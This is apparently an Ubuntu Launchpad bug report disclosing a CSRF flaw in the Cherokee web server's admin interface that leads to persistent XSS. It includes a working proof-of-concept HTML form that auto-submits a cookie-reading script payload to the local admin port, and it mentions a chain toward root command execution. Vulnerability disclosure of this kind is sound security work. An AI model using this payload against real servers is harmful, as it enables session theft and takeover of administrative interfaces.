Ubuntu
cherokee package

csrf & xss issue (resulting from csrf).

Bug #784632 reported by David
258
This bug affects 1 person
Affects Status Importance Assigned to Milestone
cherokee (Ubuntu)
Confirmed
Undecided
Unassigned

Bug Description

Binary package hint: cherokee

The cherokee admin server is vulnerable to csrf.

Using csrf it is possible to produce a persistent xss in several pages - including the 'status' page via the 'nickname field' of a vserver.
An example of this is the following:

<html>
<body>
 <form action="http://127.0.0.1:9090/vserver/apply" method="post" id="xssform">
 <input type="text" name="tmp!new_droot" value='/var/www/'></input>
 <input type="text" name="tmp!new_nick" value='" onselect=alert(1) autofocus> <embed src="javascript:alert(document.cookie)">'></input>
</form>
<script>document.getElementById("xssform").submit();</script>
</body>

A Worst case scenario could be something like the following:
If a user is logged in and the cherokee admin server is running on localhost:9090 then if they visit a $bad page - the bad page may be able to send requests to the server so as to reconfigure it to:

1. run as root
2. the logging of error(or access) will run a command ...

See original description

CVE References

Revision history for this message
David (d--) wrote :

minor fixy

description: updated
description: updated
Jamie Strandboge (jdstrand)
Changed in cherokee (Ubuntu):
status: New → Confirmed
visibility: private → public
Revision history for this message
Jamie Strandboge (jdstrand) wrote :

This is also being discussed here:
http://seclists.org/fulldisclosure/2011/Jun/0
http://www.openwall.com/lists/oss-security/2011/06/02/2
http://www.openwall.com/lists/oss-security/2011/06/03/6

To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.
Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.